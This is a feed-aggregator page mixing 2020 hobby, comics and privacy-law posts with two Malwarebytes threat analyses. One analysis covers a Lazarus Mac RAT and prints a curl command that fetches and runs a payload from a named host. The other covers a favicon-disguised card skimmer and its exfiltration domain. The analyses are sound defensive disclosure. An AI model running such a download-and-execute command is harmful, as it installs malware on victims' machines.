Feed aggregator

Reputation for Sentinels of Echo City

The Splintered Realm - Thu, 05/07/2020 - 17:16

I am working on the first setting supplement, for Boondock's Hideaway, and was thinking about how helpful it would be to have a 'rating' for how well a hero or villain is known. I started tinkering, and came up with a system I like and will be play testing - this is not "official" yet, but an official set of rules will be with the first supplement in this series. Feedback is most welcome!
It’s a negative or positive value that reflects how well known a character is. While CHA is your ability to use your personal charm and influence, reputation is your larger popularity in the game world.
Reputation ranges from -20 to +20. It is used as a check in any situation where you might get a public response to your name. Every time you do something that might affect your reputation, attempt a 1d20 check. If you roll on the OPPOSITE side of your reputation in the relevant direction, it moves 1 point that way. When you do something good, you want to roll above your current reputation. It is hard to maintain a strong reputation in either direction; if you want to be greatly feared, you better not accidentally help someone out - you might get caught on camera and have people say nice things about you. A 20 always ‘succeeds’ (moving in the direction of the check) and a 1 always ‘fails’, moving you towards reputation 0. Villains do bad stuff and want a 20 to get 'more negative' in their reputation, and heroes do good stuff and want a 20 to get 'more betterer' in their reputation. Or something like that.
For example, as a new hero, you have a reputation of 0. You rescue a kitty from a tree. The old lady who you helped immediately posts on social media (yeah, old ladies have Facebook, too.) You attempt a check, with a target of rolling over a 0. As long as you don’t roll a 1, you succeed; good news, 95% of the time you are at reputation 1. After several adventures, your reputation is now 7. You are rocking it. Unfortunately, you get some bad press when you get into a fight with Mr. Awesome (it was a misunderstanding that you totally worked out). Unfortunately, Twitter doesn’t see it that way; You roll 1d20, and you want to avoid rolling below your current reputation; if you roll 6 or less, your reputation drops 1 point; a roll of 7 or better doesn’t help you (because this is a ‘negative’ reputation check) but at least the only fallout from the fight is literal fallout from the thermonuclear device that was set off over the Pacific (it was a BIG misunderstanding). 
Reputation in Play
Reputation allows you to make a reaction check when you aren’t there, or when your name alone is being used in some context, but you are not the one making a CHA check. In many situations, you are trying a reputation check before a CHA check. “You’ve never heard of Magnet Master? Oh. Well, look guys… if you could help me out this time, I’d really appreciate it…”
You attempt a check based on your reputation rating. While a reputation of 1 is going to make it unlikely for something special to happen, a reputation of 10+ is going to be helpful. Reputation also works for epic checks; with reputation 14+, you can do amazing things. “Because Lord Wrack threatened to attack the America’s Day Parade, we are canceling the whole thing - and all parades forever until he is in prison.”... “Normally, we don’t just hand out F-16s to civilians, but you are Doc Stalwart after all…”
The default setting for reputation for existing characters would be level x3. Therefore, Lord Wrack as a villain 5 starts you game at -15 reputation, and he's trying to really, really hard to get to -20.

New Talent: Popular
You start with 1d4+2 reputation. You score critical success on a reputation check with a roll of 19 or 20, and you may attempt a Featto avoid reputation loss when you roll a botch on a reputation check. You automatically receive +1 reputation every time you level up.

Data privacy law updates eyed by Singapore

Malwarebytes - Thu, 05/07/2020 - 15:15

In early 2019, Singapore’s data privacy regulators proposed that the country’s data privacy law could use two new updates—a data breach notification requirement and a right of data portability for the country’s residents.

The proposed additions are commonplace in several data privacy laws around the world, including, most notably, the European Union General Data Protection Regulation, or GDPR, a sweeping set of data protections that came into effect two years ago.

If Singapore approves its two updates, it would be the latest country in a long line of other countries to align their own data privacy laws with GDPR.

The appeal is clear: Countries that closely hew their own data privacy laws to GDPR have a better shot at obtaining what is called an “adequacy determination” from the European Commission, meaning those countries can legally transfer data between themselves and the EU.

Such a data transfer regime is key to engaging in today’s economy, said D. Reed Freeman Jr., cybersecurity and privacy practice co-chair at the Washington, D.C.-based law firm Wilmer Cutler Pickering Hale and Dorr. If anything, the proposed appeal to GDPR is as much an economic decision as it is one of data privacy rights.

“The world’s economy depends on data flows, and the more restrictive the data flows are, the better,” Freeman said. “Multinational [organizations] in Singapore would like to have an adequacy determination.”

Singapore’s Personal Data Protection Act

On October 15, 2012, Singapore passed its data protection law, the Personal Data Protection Act (PDPA), putting into place new rules for the collection, use, and disclosure of personal data. The PDPA did two other things. It created a national “Do Not Call” register and it established the country’s primary data protection authority, the Personal Data Protection Commission.

For years, the Personal Data Protection Commission has issued warnings to organizations that violate the country’s data protection law, publishing their decisions for the public to read. It is the same commission responsible for the current attempts to update the law.

Today, Singaporeans enjoy some of the same data protection rights found in the European Union and even in California.

For starters, Singaporeans have the right to request that an organization hand over any personal data that belongs to them. Further, Singaporeans also have the right to correct that personal data should they find any errors or omissions.

Singapore’s data privacy law also includes restrictions for how organizations collect, use, or disclose the personal data of Singaporeans.

According to the PDPA, organizations must obtain “consent” before collecting, using, or disclosing personal data (more on that below). Organizations must also abide by “purpose” limitations, meaning that they can “collect, use or disclose personal data about an individual only for purposes that a reasonable person would consider appropriate in the circumstances and, if applicable, have been notified to the individual concerned.” Organizations must notify individuals about planned collection, use, and disclosure of personal data, and collected personal data must be accurate.

Further, any personal data in an organization’s possession must be protected through the implementation of “reasonable security arrangements to prevent unauthorized access, collection, use, disclosure, copying, modification, disposal or similar risks.” And organizations also have to “cease to retain” documents that contain personal data, or “remove the means by which the personal data can be associated with particular individuals” after the purpose for collecting personal data ends.

While these rules sound similar to GDPR, there are discrepancies—including how Singapore and the EU approach “consent.” In Singapore’s PDPA, consent is not required to collect personal data when that data is publicly available, is necessary for broadly defined “evaluative purposes,” or collected solely for “artistic or literary purposes.” In the EU, there are no similar exceptions.

Two other areas where the laws differ are, of course, data portability and data breach notification requirements. Singapore’s law has none.

Proposed data privacy additions

On February 25, 2019, Singapore’s Personal Data Protection Commission published a “discussion paper” on data portability, explaining the benefits of adding a data portability requirement to the PDPA.

“Data portability, whereby users are empowered to authorize the movement of their personal data across organizations, can boost data flows and support greater data sharing in a digital economy both within and across sectors,” the PDPC said in a press release.

With a right data portability, individuals can request that organizations hand over their personal data in a format that lets them easily move it to another provider and basically plug it in for immediate use. Think of it like taking your email contacts from one email provider to another, but on a much larger scale and with potentially less value—it’s not like your Facebook status updates from 2008 will do you much good on Twitter today.

Less than one week after publishing its data portability discussion paper, the Personal Data Protection Commission also announced plans to add a data breach notification requirement to the PDPA.

The Personal Data Protection Commission proposed that if organizations suffered a data breach that potentially harmed individuals, those individuals and the PDPC itself would need to be notified. Further, even if a data breach brought no potential harm to individuals, organizations would need to notify the PDPC if more than 500 people’s personal data was affected.

Following public consultations, the data portability requirement was well-received.

Why attempt data privacy updates now?

Aligning a country’s data protection laws with the protections provided in GDPR is nothing new, and in fact, multiple countries around the world are currently engaged in the same process. But Singapore’s timing could potentially be further pinned down to another GDPR development in early January of 2019—an adequacy determination granted by the European Commission to another country, Japan.

Wilmer Hale’s Freeman said it is likely that Singapore looked to Japan and wanted the same.

“[Singapore] is competing in the Asia market and in the global market, and I would suspect that the leaders in Singapore saw what happened in Japan, asked the relevant people at the Commission, ‘What do we need to do to get that?’ and were told ‘If you line up [PDPA] pretty close, we have a good chance of getting an adequacy determination.’” Freeman said.

Freeman explained that, in recent history, obtaining an adequacy determination relies on whether a country’s data protection laws are similar to GDPR.

“Over time, it’s been sort of short-hand thought of as ‘adequacy’ means something close to ‘equivalent,’” Freeman said.

As to the importance, Freeman explained that any multinational business that wants to move data between its home country and the EU must, per the rules of GDPR, obtain an adequacy determination. No determination, no legal opportunity to engage in the world’s economy.

“If you’re a multinational company and you have employees and customers in Europe, and you want to store the data at the home office in Singapore, you need a lawful basis to do that,” Freeman said. An adequacy determination is that legal basis, Freeman said, and it’s far more difficult to “undo” an adequacy determination than it is a bilateral agreement, like the one struck down by the Court of Justice for the European Union between the EU and the United States.

Don’t reinvent the data privacy wheel

Singapore has not proposed a time frame for when it wants to finalize the data portability rights and data breach notification requirements. Nor has it specified the actual regulations it would put in place—including how long before the Personal Data Protection Commission would enforce the new requirements, or what those enforcement actions would entail.

Freeman suggested that when the Singaporean government clarifies its proposals, it look to its neighbors across the world who have grappled with the same questions on data breach notifications and data portability.

For data portability, Freeman explained that many large corporations have already struggled to comply with the rules both in GDPR and in the California Consumer Privacy Act, not because of an inability to do so, but because providing such in-depth data access to individuals requires understanding all the places where an individual’s personal data can live.

“Is it stored locally? On servers in different places? Is it in email? In instant messaging? On posts?” Freeman said.

For data breach notification requirements, Freeman also said that it makes little sense to create something “out of whole cloth” that will create new burdens on multinational businesses that already have to comply with the data breach notification requirements in GDPR and in the 50 US states.

It’s better to find what currently works, Freeman said, and borrow.

The post Data privacy law updates eyed by Singapore appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Crafty Mother’s Day Gifts: 50+ Free Patterns to Crochet, Knit, and Sew

Moogly - Thu, 05/07/2020 - 15:00

Crafty Mother’s Day gift ideas are always appreciated – and there are tons of great crochet, knit, and sewing patterns free on Yarnspirations! I’ve highlighted some that you don’t want to miss, and added a few free Moogly patterns too! Disclaimer: This post is sponsored by Yarnspirations. First, get all the main links. Then see...

Read More

The post Crafty Mother’s Day Gifts: 50+ Free Patterns to Crochet, Knit, and Sew appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

Categories: Crochet Life

REVIEW CORNER: Super Duck # 1

First Comics News - Thu, 05/07/2020 - 14:11

“Super Duck # 1” (2020)

Writers: Frank Tieri & Ian Flynn
Artist: Ryan Jampole
Colorist: Matt Herms
Letterer: Jack Morelli


I guess that I can’t leave those darn anthropomorphic characters alone, can’t it?! Well, it looks like this week I’ll take a look at Super Duck # 1 from the good folks at Archie Comics. When I read this, I have to say that this was very entertaining; Think “Ducktales” mixed in with the spirit of Superman along with a good dose of Deadpool thrown in for good measure. Really love how the book kicks off with the standard yet classic opening of the hero fighting his number one arch-nemesis in this case, Super Duck’s main villain is Dapper Duck (Who’s a perfect parody of The pre-Crisis Lex Luthor) and you’ll enjoy the action sequences the incorporate the comedic elements that really brings the story alive. For his part, Frank Tieri brings the humor that he showcased on his “Harley Quinn” run as well as his “Old Lady Harley” miniseries and it works very perfectly with a character such a Super Duck, plus I also have to add that I love that his powers come from taking “Super Vitamins” (That plot device will be played out in his miniseries); But this series is just so fun and silly when it comes to poking fun at the whole superhero genre that you’ll find yourself rooting for Super Duck or wondering if he’ll get his act together (He can be a little egotistical), But this is a comic that should be on anyone’s radar and it wouldn’t surprise me if Super Duck comes back for an ongoing series due to the enthusiasm that’s on display thanks to this series’ first issue.

Next Week I’ll keep “Review Corner’ going with another review so be on the lookout for that and I’ll see you all next time.

Categories: Comic Book Blogs


First Comics News - Thu, 05/07/2020 - 13:58


BURBANK, CA – May 7, 2020 – The ultimate destination for DC fans, DC UNIVERSE, unveiled a new program today, DC Universe Rewards. Running from May 7 through the fall, the program is designed to reward fans for doing what they already love – diving deep into their fandom. Giving all fans – not just service subscribers – the opportunity to participate in select options, the DC Universe Rewards program features can’t-miss items and exclusive releases, all at no cost.

An authentic celebration of fandom, DC Universe Rewards will enable users to earn special tokens for ongoing engagement and participation on DC UNIVERSE, including the free-to-all Community section, editorial features and “DC Daily.” These tokens are redeemable for an amazing set of rewards, from a 30-day premium subscription to DC UNIVERSE to ultra-exclusive collectibles such as a special, limited edition Harley Quinn Super-Villains pin set.  DC Universe Rewards will offer new earn opportunities and rewards each week.

Fans can earn tokens and “level up” simply by doing what they already love. Whether it’s subscribers finishing a DC digital comic, watching an entire DC movie or TV episode, or even non-subscribers and subscribers alike interacting with other fans on the DC UNIVERSE community boards, there are various opportunities for fans to accumulate tokens that can be redeemed for rewards.

All participants need to do is register for free on DC UNIVERSE and select a customized avatar. Then they can start earning tokens redeemable for rewards by navigating to the rewards program in the MyDC section of DC UNIVERSE or clicking/tapping on REWARDS in the menu.

Below are prizes currently available with the official launch of DC Universe Rewards, with more continuously rolling out throughout the program:

  • DC Universe 30-day Premium Subscription
  • DCU Exclusive HARLEY QUINN Super-Villains Pin Set
  • DC Universe Exclusive Harley Quinn Show Statue
  • DC Artists Alley Batgirl (White & Gold) by Sho Murase Designer Vinyl
  • Digital Movie Redemption via Movies Anywhere
  • DC Universe Exclusive Limited Edition TITANS Poster
  • DC Universe Exclusive Limited Edition DOOM PATROL Poster
  • DC Universe Meta Madhouse Lex Luthor Masterminds T-shirt
  • DC Universe Meta Madhouse Darkseid Invaders T-shirt
  • DC Universe Meta Madhouse The Cheetah Beasts T-shirt
  • DC Universe Exclusive Batcave Wallpapers
  • DC Universe Exclusive Fortress of Solitude Wallpapers
  • Shop DC $5 Off Purchase
  • Shop DC $10 Off Purchase
  • Shop DC $25 Off Purchase

Plus, DC Universe Exclusive rewards tied to the upcoming debut of STARGIRL, DOOM PATROL Season Two and much more – coming soon!

Categories: Comic Book Blogs

The Thundarr Roadtrip

Sorcerer's Skull - Thu, 05/07/2020 - 11:00

I ran across a podcast yesterday that is reviewing the the episodes of Thundarr the Barbarian in way that sensibly traces Thundarr and crew's travels across post-apocalyptic North America and beyond. It's called appropriately Thundarr Road.

The Sheldon Mayer Estate Featuring Sugar and Spike & Many of His Earliest Works Sell for $284,452 

First Comics News - Thu, 05/07/2020 - 07:37

LOS ANGELES,  May 6, 2020 – The Sheldon Mayer collections featuring “Sugar and Spike” comic strips was auctioned for $284,452 last Thursday by Nate D. Sanders Auctions.

The highest price realized was an Original “Scribbly” artwork from September 1939, which sold for $29,845. These iconic four pages of Scribbly appeared as four complete stories in the #6 issue, chronicling Scribbly Jibbet’s journey of getting hired as a 13 1/2 year old boy cartoonist, a storyline based on Mayer’s own experiences in the comic book industry during the early 1930s.

Categories: Comic Book Blogs


Looking For Group - Thu, 05/07/2020 - 04:00

The post 1398 appeared first on Looking For Group.

Categories: Web Comics

Moogly Live May 6, 2020 – Answering Your Questions!

Moogly - Wed, 05/06/2020 - 16:07

Let’s chat today! On this Facebook Live, it’s the usual Moogly updates – the latest projects, a couple sneak peeks, and the latest Moogly news! Then, follow me over to YouTube where I’ll be answering any questions you have on crochet, knitting, and crafts! Disclaimer: This post is sponsored by Yarnspirations, and contains affiliate links....

Read More

The post Moogly Live May 6, 2020 – Answering Your Questions! appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

Categories: Crochet Life

New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app

Malwarebytes - Wed, 05/06/2020 - 15:59

This blog post was authored by Hossein Jazi, Thomas Reed and Jérôme Segura.

We recently identified what we believe is a new variant of the Dacls Remote Access Trojan (RAT) associated with North Korea’s Lazarus group, designed specifically for the Mac operating system.

Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional covert remote access Trojan targeting the Windows and Linux platforms.

This Mac version is at least distributed via a Trojanized two-factor authentication application for macOS called MinaOTP, mostly used by Chinese speakers. Similar to the Linux variant, it boasts a variety of features including command execution, file management, traffic proxying and worm scanning.


On April 8th, a suspicious Mac application named “TinkaOTP” was submitted to VirusTotal from Hong Kong. It was not detected by any engines at the time.

The malicious bot executable is located in “Contents/Resources/Base.lproj/” directory of the application and pretends to be a nib file (“SubMenu.nib”) while it’s a Mac executable file. It contained the strings “c_2910.cls” and “k_3872.cls” which are the names of certificate and private key files that had been previously observed.


This RAT persists through LaunchDaemons or LaunchAgents which take a property list (plist) file that specifies the application that needs to be executed after reboot. The difference between LaunchAgents and LaunchDaemons is that LaunchAgents run code on behalf of the logged-in user while LaunchDaemon run code as root user.

When the malicious application starts, it creates a plist file with the “com.aex-loop.agent.plist” name under the “Library/LaunchDaemons” directory. The content of the plist file is hardcoded within the application.

 The program also checks if “getpwuid( getuid())” returns the user id of the current process. If a user id is returned, it creates the plist file “com.aex-loop.agent.plist” under the LaunchAgents directory: “Library/LaunchAgents/”.

Figure 1: Plist file

The file name and directory to store the plist are in hex format and appended together. They show the filename and directory backwards.

Figure 2: Directory and file name generation Config File

The config file contains the information about the victim’s machine such as Puid, Pwuid, plugins and C&C servers. The contents of the config file are encrypted using the AES encryption algorithm.

Figure 3: Load config

 Both Mac and Linux variants use the same AES key and IV to encrypt and decrypt the config file. The AES mode in both variants is CBC.

Figure 4: AES Key and IV

The config file location and name are stored in hex format within the code. The name of the config file pretends to be a database file related to the Apple Store:


Figure 5: Config file name

The “IntializeConfiguration” function initializes the config file with the following hardcoded C&C servers.

Figure 6: Initialize config file

The config file is constantly updated by receiving commands from the C&C server. The application name after installation is “mina”. Mina comes from the MinaOTP application which is a two-factor authentication app for macOS.

Figure 7: Config file is being updated Main Loop

After initializing the config file, the main loop is executed to perform the following four main commands:

  • Upload C&C server information from the config file to the server (0x601)
  • Download the config file contents from the server and update the config file (0x602)
  • Upload collected information from the victim’s machine by calling “getbasicinfo” function (0x700)
  • Send heartbeat information (0x900)

The command codes are exactly the same as Linux.dacls.

Figure 8: Main Loop Plugins

This Mac RAT has all the six plugins seen in the Linux variant with an additional plugin named “SOCKS”. This new plugin is used to proxy network traffic from the victim to the C&C server.

The app loads all the seven plugins at the start of the main loop. Each plugin has its own configuration section in the config file which will be loaded at the initialization of the plugin.

Figure 9: Plugins loaded CMD plugin

The cmd plugin is similar to the “bash” plugin in the Linux rat which receives and executes commands by providing a reverse shell to the C&C server.

Figure 10: Cmd Plugin File Plugin

The file plugin has the capability to read, delete, download, and search files within a directory. The only difference between the Mac and Linux version is that the Mac version does not have the capability to write files (Case 0).

Figure 11: File plugin Process plugin

The process plugin has the capability of killing, running, getting process ID and collecting process information.

Figure 12: Process Plugin

If the “/proc/%d/task” directory of a process is accessible, the plugin obtains the following information from the process where %d is the process ID:

  • Command line arguments of the process by executing “/proc/ %/cmdline”
  • Name, Uid, Gid, PPid of the process from the “/proc/%d/status” file.
Test plugin

The code for the Test plugin between Mac and Linux variant is the same. It checks the connection to an IP and Port specified by the C&C servers.

RP2P plugin

The RP2P plugin is a proxy server used to avoid direct communications from the victim to the actor’s infrastructure.

Figure 13: Reverse P2P LogSend plugin

The Logsend plugin contains three modules that:

  • Check connection to the Log server
  • Scan network (worm scanner module)
  • Execute long run system commands
Figure 14: Logsend Plugin

This plugin sends the collected logs using HTTP post requests.

Figure 15: User Agent

An interesting function in this plugin is the worm scanner. The “start_worm_scan” can scan a network subnet on ports 8291 or 8292. The subnet that gets scanned is determined based on a set of predefined rules. The following diagram shows the process of selecting the subnet to scan.

Figure 16: Worm Scan Socks plugin

The Socks plugin is the new, seventh plugin added to this Mac Rat. It is similar to the RP2P plugin and acts as an intermediary to direct the traffic between bot and C&C infrastructure. It uses Socks4 for its proxy communications.

Figure 17: Socks4 Network Communications

C&C communication used by This Mac RAT is similar to the Linux variant. To connect to the server, the application first establishes a TLS connection and then performs beaconing and finally encrypts the data sent over SSL using the RC4 algorithm.

Figure 18: Traffic generated by the Application (.mina) Figure 19: TLS connection

Both Mac and Linux variants use the WolfSSL library for SSL communications. WolfSSL is an open-source implementation of TLS in C that supports multiple platforms. This library has been used by several threat actors. For example, Tropic Trooper used this library in its Keyboys malware.

Figure 20: WolfSSL

The command codes used for beaconing are the same as the codes used in Linux.dacls. This is to confirm the identity of the bot and the server.

Figure 21: Beconing

The RC4 key is generated by using a hard-coded key.

Figure 22: RC4 Initialization Variants and detection

We also identified another variant of this RAT which downloads the malicious payload using the following curl command:

curl -k -o ~/Library/.mina https://loneeaglerecords.com/wp-content/uploads/2020/01/images.tgz.001 > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev

We believe this Mac variant of the Dcals RAT is associated with the Lazarus group, also known as Hidden Cobra and APT 38, an infamous North Korean threat actor performing cyber espionage and cyber-crime operations since 2009. 

The group is known to be one of the most sophisticated actors, capable of making custom malware to target different platforms. The discovery of this Mac RAT shows that this APT group is constantly developing its malware toolset.

Malwarebytes for Mac detects this remote administration Trojan as OSX-DaclsRAT.

IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001

The post New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Credit card skimmer masquerades as favicon

Malwarebytes - Wed, 05/06/2020 - 15:15

Malware authors are notorious for their deceptive attempts at staying one step ahead of defenders. As their schemes get exposed, they always need to go back to their bag of tricks to pull out a new one.

When it comes to online credit card skimmers, we have already seen a number of evasion techniques, some fairly simple and others more elaborate. The goal remains to deceive online shoppers while staying under the radar from website administrators and security scanners.

In this latest instance, we observed an old server-side trick combined with the clever use of an icon file to hide a web skimmer. Threat actors registered a new website purporting to offer thousands of images and icons for download, but which in reality has a single purpose: to act as a façade for a credit card skimming operation.

The suspicious favicon

This latest case started with an image file displayed on the browser’s tab often used for branding or identifying a website, also known as a favicon.

Figure 1: Some favicons from popular websites

While reviewing our crawler logs, we noticed requests to a domain called myicons[.]net hosting various icons and, in particular, favicons. Several e-commerce sites were loading a Magento favicon from this domain.

Figure 2: A favicon.png for the Magento CMS

This in itself is not particularly suspicious. However, we noticed that the domain myicons[.]net was registered just a few days ago and was hosted on a server (83.166.244[.]76) that was previously identified as malicious. In a blog post, web security company Sucuri disclosed how this host was part of a web skimming campaign using time-based domain names.

In addition, we found that the person who registered myicons[.]net stole all the content from a legitimate site hosted at iconarchive.com; and they did it in the most simple way—by loading it as an iframe:

<iframe src="http://www.iconarchive.com/" width="100%" height="1015px" frameborder="0" align="left"> Figure 3: Decoy site with original site

Our suspicions were that the favicon.png file was malicious and perhaps using stenography to hide JavaScript code. But this was not the case. The image was properly formatted, with no extra code inside.

Figure 4: Suspicious image file turns out to be clean Conditional server-side response

To better understand what was going on before ruling this out as a false alert, we examined how this file was served in the context of an online purchase. Low and behold, when visiting the checkout page of a compromised Magento website, the innocent favicon.png turned into something else altogether.

Figure 5: The same web request with a referer including the ‘checkout’ keyword

Instead of serving a PNG image, the malicious server returns JavaScript code that consists of a credit card payment form. This content is loaded dynamically in the DOM to override the PayPal checkout option with its own drop down menu for MasterCard, Visa, Discover and American Express.

Figure 6: Malicious content hijacks default payment form “Ant and cockroach” skimmer

This skimmer may be familiar to some under the nickname “ant and cockroach.” It is somewhat unique in that it is customized for English and Portuguese checkout forms.

In addition to JavaScript code, it contains HTML that will be injected into the checkout page of compromised stores. The idea is to blend in so that shoppers don’t notice anything suspicious.

Figure 7: Rogue HTML form injected into checkout page

While web skimmers primarily focus on credit card data, they typically also collect additional personal information about the victims including name, address, phone number, email.

Figure 8: Data fields collected by the skimmer

That data is encoded and then sent back to the criminals. For client-side skimmers, the exfiltration domain could be another hacked site or a malicious site registered strictly for this purpose.

Figure 9: Exfiltration code sending data back to the criminals

Here the exfiltration domain is psas[.]pw and resides on known criminal infrastructure on the IP address 83.166.242[.]105. Back in March we described a campaign abusing Cloudflare’s Rocket Loader script which we believe is tied to the same threat group.

One of many web skimmer campaigns

Given the decoy icons domain registration date, this particular scheme is about a week old but is part of a larger number of ongoing skimming attacks.

Malwarebytes users are protected via our real-time web security module available in both Malwarebytes for Windows and via our Browser Guard extension available for both Google Chrome and Mozilla Firefox.

Figure 10: Malwarebytes Browser Guard blocking data exfiltration Indicators of Compromise

Skimmer URL, domain, IP and SHA256

myicons[.]net/d/favicon.png myicons[.]net 83.166.244[.]76 825886fc00bef43b3b7552338617697c4e0bab666812c333afdce36536be3b8e

Exfiltration domain and IP

psas[.]pw 83.166.242[.]105

The post Credit card skimmer masquerades as favicon appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GFL – Page 0022

Looking For Group - Wed, 05/06/2020 - 13:00

Grouping For Looks is a page-by-page retelling of the Looking For Group saga through the lens of a mirror universe where Cale is a goateed tyrant and Richard is a holy soul trying to set him on a good path. […]

The post GFL – Page 0022 appeared first on Looking For Group.

Categories: Web Comics

Hoard of Delusion

Ten Foot Pole - Wed, 05/06/2020 - 11:43
By Mark Ahmed, Sean Ahmed, Scot Hoover Axe mental Productions OSRIC Levels 1-4

Hidden below the Black Fen lies the fabled Hoard of Delusion.

This 117 page adventure presents a village, wilderness region, and fifty room four level dungeon. It’s easy to see what it wants to do, but is bogged down with not knowing how to get there. Good ideas marred by poor execution; this needs a full rework to be usable.

This is striving to be like the adventures of Ye Olde Days, the better ones anyway, with a village, a wilderness region, and a multi level dungeon. It’s built around the dungeon, with village and wilderness encounters supporting/proving hints to the dungeon. The village and wilderness have interconnections within thm, and a couple of sub-plotty/other shit going on things going on. There’s even a keep in the village. The idea of a village, wilderness area and dungeon environment supporting each other is great, it’s what adventures of this type SHOULD be doing.

Further, the dungeon environment has some good ideas. New monsters, and classic elements abound. Giant octopus, mimic-like things, a giant eyeball on a ceiling, cracks in the earth that mist flows from, a rope bridge, and brains in jars. 

It’s marred, though, by being nigh unusable because of the description style used. And some pretty hairy encounters.

Level 1-4? Great! The area in the ruins, outside of the dungeon has a 5 HD hydra. The first room of the dungeon has a 7HD baddie with a gaze attack. 10HD black pudding? Toss it in there! A 12HD monster? No problem! I get it, OSR, you can run away. But the first room? And the dungeon entrance/ruins outside? This seems more like an issue of scaling. 

Further, the treasure is low throughout. It notes that the wilderness areas can be used to gain levels/experience before tacking the dungeon. (You know, the one with a HD hydra outside and 7HD monster in the first room? The one with the gaze attack?) But the loot is low, WAY too low, for anyone to be doing much leveling. Not quite comically low, but it’s hard for me to see a party leveling to three, and two might be difficult if you don’t recover everything available.

The village is described incorrectly, of course, most villages are. The mundanity and backstory of the people, with little assistance on the subplots or a reference on where the party might like to go. Villages are not explored like dungeons. You don’t walk down the street looking in to every shop. You get directions to the General Store and go there. And yet, this is laid out like a typical dungeon. 

And then there’s small map issues and other mistakes. No stairs on the map in the first room of the dungeon. Encounters left off of the wilderness maps. Just sloppy stuff.

But, the real issue is the encounter descriptions. As always.

The descriptions can be long. VERY long in cases. Page long rooms. No one can run a fucking page long room well unless the formatting and layout are par excellance. And they ain’t here. It doesn’t matter: village, wilderness, dungeon, the encounters are all done in the same manner and SO. FUCKING. FRUSTRATING. Ignoring, for a moment, the usual tavern descriptions and  how everyone on earth feels the need to redescribe it, the rooms are a fucking mess. This room used to be. However frank looted all of the bodies. A paragraph of backstory. Important details mixed in to the backstory descriptions. Conversational, with no knowledge of how to organize a description. The inn has three or four tables and a booth. Great. A wonderful night of D&D was then had. This fucking shit is garbage. This is a bit hyperbolic, but: Does every fucking word of your description contribute to the ACTIVE adventuring environment? No? Then fucking cut it. And then, when writing a description, put the important and obvious shit up at the front of the description.

When the players open the door to a room I’m not taking ten fucking minutes to read the fucking room description to myself before conveying it to them. The fucking phones come out, and rightfully fucking so. I’d be a shitty shitty DM if I did that. But what other choices do you have? Ye Olde Highlighter, going through the adventure highlighting and making margin notes? Seriously? If you have to fucking do that then the adventure was not written well. It’s failing at its core purpose: being useful to the DM as a play aid at the table. Why the fuck is this so hard to grasp? People bitch a blue streak that they don’t use adventures because they are a pain and require prep, note taking and highlighting. They are fuckign right. 

What’s all the sadder is that you can tell what this wanted to BE. The village, the wilderness, the dungeon. The interconnectedness. The classic dungeon elements. Iconic rooms that don’t feel like set pieces. But in the end none of that matters, because it’s 117 pages of unusable adventure.

This is $12 at DriveThru. The preview is 80 pages. That’s what I like to see! Take a gander at room one on page 58 of the preview/54 of the book. Good idea. Some useful imagery. One of the better rooms and MIGHT be salvage if all of the other rooms were as good ths this. Maybe.


Categories: Tabletop Gaming Blogs

Wednesday Comics: Fourth World Reread Week 2

Sorcerer's Skull - Wed, 05/06/2020 - 11:00
One thing that virtually all of the continuations of the Fourth World saga by other hands seem to miss is that it isn't just a superhero action epic, but like all good mythologies, there are things going on beneath the surface.

New Gods #6 (on sale in October of 1971), continues Orion's struggle against the Deep Six, a group of Apokiliptian fishmen with the ability to mutate other lifeforms. They are not the best villains of the saga by any means, but Kirby uses them in issue 5 to reveal things about Orion, and in this issue, "Glory Boat!" to tell an allegorical story about war and its human cost.

The setup is almost Biblical. A great sea creature recalling Leviathan and all the primeval, Chaos monsters of the depths, a family, emblematic of humanity as a whole: the bellicose and overbearing father, the "conscientious objector" son, and the daughter who doesn't get to do much between the two's bickering. God of war Orion also has someone to play off here, his friend, Lightray, embodying the enlightenment of New Genesis.

Where Orion's instinct is to destroy his foes, Lightray strives to show a better way, to rehabilitate. He succeeds in transforming one of the Deep Sixes' creatures into the service of our heroes. Unfortunately, for the humans, the Deep Six are drawn back to the boat.

The father freezes, having some sort of breakdown when confronted with the creatures. The son, the peacenik, goes on the offensive, attacking the Apokoliptian Jafar. Jafars kills him, mutating his face into that of a featureless, metallic mannequin. Lightray opines that the war has taken "another faceless hero."

Lashed to the mast, the father bears witness to what is to come.  Orion and Lightray take the son's body and launch themselves into a possibly final attack against the remaining Deep Three, in an epic two page spread.

But Lightray and Orion are not destine for some Neo-Vahalla, just yet. The boy goes "to the Source" and the New Gods live to fight another day. The father, still on the mast amid the wreckage of the ship is left to wonder as Kirby tells us: "What is a man in the last analysis--his philosophy or himself?"

It's heavy-handed perhaps, but no more so than work of the writers that would come to be seen as seminal figures of the 70s leading the "maturation" of comics.

BIG FINISH: Timeslip &#8211; Livestream premiere TONIGHT!

Blogtor Who - Wed, 05/06/2020 - 10:50

At 22:00 (UK time) the first episode of the brand new Timeslip series will premiere as a livestream on YouTube, giving Big Finish fans an exclusive chance to listen for free. Timeslip was originally an ITV series broadcast in 1970, which followed two children, Simon and Liz, on their adventures through a ‘time barrier’ as […]

The post BIG FINISH: Timeslip – Livestream premiere TONIGHT! appeared first on Blogtor Who.

Categories: Doctor Who Feeds

Myth Beyond The Monster Manual - The Erinyes Devils of Violence & Justice For Your Old School Sword & Sorcery Campaigns

Swords & Stitchery - Wed, 05/06/2020 - 05:21
